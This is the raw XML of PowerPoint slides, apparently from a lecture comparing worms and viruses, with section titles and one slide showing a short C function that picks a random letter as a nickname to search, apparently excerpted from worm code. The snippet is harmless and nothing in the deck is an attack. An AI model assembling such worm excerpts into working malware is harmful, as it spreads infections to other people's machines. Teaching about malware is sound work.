            <a:ext cx="7272655" cy="4492625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B0F0">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="00B0F0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t> /* generate random nicks to search */</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>void GetRandNick(void)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>	char possible_searches[] = "qwertyuiopasdfghjklzxcvbnm";</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>	srand(GetTickCount());</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>	rnd_nick[0] = possible_searches[rand()%26];</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>	rnd_nick[1] = 0;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="0202060305040502030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图片 116"/>
          <p:cNvPicPr/>
          <p:nvPr userDrawn="1">
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12192635" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1">
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-2"/>
            <a:ext cx="12191998" cy="6858002"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:alpha val="917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 name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4610735" y="2492058"/>
            <a:ext cx="6845300" cy="1873885"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="7000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="5500" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="88219F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Comparison</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="5500" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="88219F"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1">
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="707653" y="-2"/>
            <a:ext cx="3391877" cy="6858002"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="A728B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文本占位符 31"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1289843" y="3127425"/>
            <a:ext cx="2157413" cy="1695450"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="96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03</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="96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1" name="文本占位符 31"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId7"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1289843" y="2729084"/>
            <a:ext cx="2157413" cy="523631"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="2400" b="1" i="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Part Three</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2400" b="1" i="1"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703" name="组合 702"/>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1952199" y="2121506"/>
            <a:ext cx="658709" cy="199812"/>
            <a:chOff x="4510429" y="6007426"/>
            <a:chExt cx="658709" cy="199812"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="696" name="L 形 695"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1">
              <p:custDataLst>
                <p:tags r:id="rId8"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="13500000">
              <a:off x="4663956" y="6008863"/>
              <a:ext cx="196938" cy="196940"/>
            </a:xfrm>
            <a:prstGeom prst="corner">
              <a:avLst>
                <a:gd name="adj1" fmla="val 19000"/>
                <a:gd name="adj2" fmla="val 19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98" name="L 形 697"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1">
              <p:custDataLst>
                <p:tags r:id="rId9"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="13500000">
              <a:off x="4818077" y="6008863"/>
              <a:ext cx="196938" cy="196940"/>
            </a:xfrm>
            <a:prstGeom prst="corner">
              <a:avLst>
                <a:gd name="adj1" fmla="val 19000"/>
                <a:gd name="adj2" fmla="val 19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00" name="L 形 699"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1">
              <p:custDataLst>
                <p:tags r:id="rId10"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="13500000">
              <a:off x="4972199" y="6008864"/>
              <a:ext cx="196938" cy="196940"/>
            </a:xfrm>
            <a:prstGeom prst="corner">
              <a:avLst>
                <a:gd name="adj1" fmla="val 19000"/>
                <a:gd name="adj2" fmla="val 19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02" name="直角三角形 701"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1">
              <p:custDataLst>
                <p:tags r:id="rId11"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="13500000">
              <a:off x="4510429" y="6007426"/>
              <a:ext cx="199812" cy="199812"/>
            </a:xfrm>
            <a:prstGeom prst="rtTriangle">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="862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704" name="矩形 703"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1">
            <p:custDataLst>
              <p:tags r:id="rId12"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="545426" y="-2"/>
            <a:ext cx="101886" cy="6858002"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="80000">
                <a:srgbClr val="A728BE"/>
              </a:gs>
              <a:gs pos="0">
                <a:srgbClr val="A728BE">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05" name="矩形 704"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1">
            <p:custDataLst>
              <p:tags r:id="rId13"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4158103" y="-2"/>
            <a:ext cx="101886" cy="6858002"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="80000">
                <a:srgbClr val="A728BE"/>
              </a:gs>
              <a:gs pos="0">
                <a:srgbClr val="A728BE">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p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12192635" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="矩形 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-2"/>
            <a:ext cx="12191998" cy="6858002"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:alpha val="917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16" name="文本框 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4260850" y="2934653"/>
            <a:ext cx="7908925" cy="988695"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="7000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" sz="5500" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="BF191A"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
                <a:cs typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Worms</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" sz="5500" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="BF191A"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
              <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
              <a:cs typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="日期占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="6356350"/>
            <a:ext cx="2743200" cy="365125"/>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74E7442A-BA00-4274-AC47-95D95C23D1C8}" type="datetimeFigureOut">
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:fld>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Segoe UI" panose="020B0502040204020203"/>
              <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="矩形 17"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="707653" y="-2"/>
            <a:ext cx="3391877" cy="6858002"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E13747">
              <a:alpha val="9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9" name="文本占位符 31"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1289843" y="3127425"/>
            <a:ext cx="2157413" cy="1695450"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="96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rPr>
              <a:t>01</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="9600" b="1" i="0"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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="文本占位符 31"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1289843" y="2729084"/>
            <a:ext cx="2157413" cy="523631"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="2400" b="1" i="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rPr>
              <a:t>Part One</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2400" b="1" i="1"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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="21" name="组合 20"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1952199" y="2121506"/>
            <a:ext cx="658709" cy="199812"/>
            <a:chOff x="4510429" y="6007426"/>
            <a:chExt cx="658709" cy="199812"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="L 形 21"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1">
              <p:custDataLst>
                <p:tags r:id="rId6"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="13500000">
              <a:off x="4663956"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3" name="L 形 22"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1">
              <p:custDataLst>
                <p:tags r:id="rId7"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="13500000">
              <a:off x="4818077"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4" name="L 形 23"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1">
              <p:custDataLst>
                <p:tags r:id="rId8"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="13500000">
              <a:off x="4972199" y="6008864"/>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5" name="直角三角形 24"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1">
              <p:custDataLst>
                <p:tags r:id="rId9"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="13500000">
              <a:off x="4510429" y="6007426"/>
              <a:ext cx="199812" cy="199812"/>
            </a:xfrm>
            <a:prstGeom prst="rtTriangle">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="D1202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grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="矩形 25"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId10"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="545426" y="-2"/>
            <a:ext cx="101886" cy="6858002"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="80000">
                <a:srgbClr val="E13747"/>
              </a:gs>
              <a:gs pos="0">
                <a:srgbClr val="E13747">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="54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27" name="矩形 26"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId11"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4158103" y="-2"/>
            <a:ext cx="101886" cy="6858002"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="80000">
                <a:srgbClr val="E13747"/>
              </a:gs>
              <a:gs pos="0">
                <a:srgbClr val="E13747">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="54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u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="07A7AF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Viruses</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="3600" b="1" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="3600" b="1" i="1" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>VS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="3600" b="1" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="3600" b="1" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
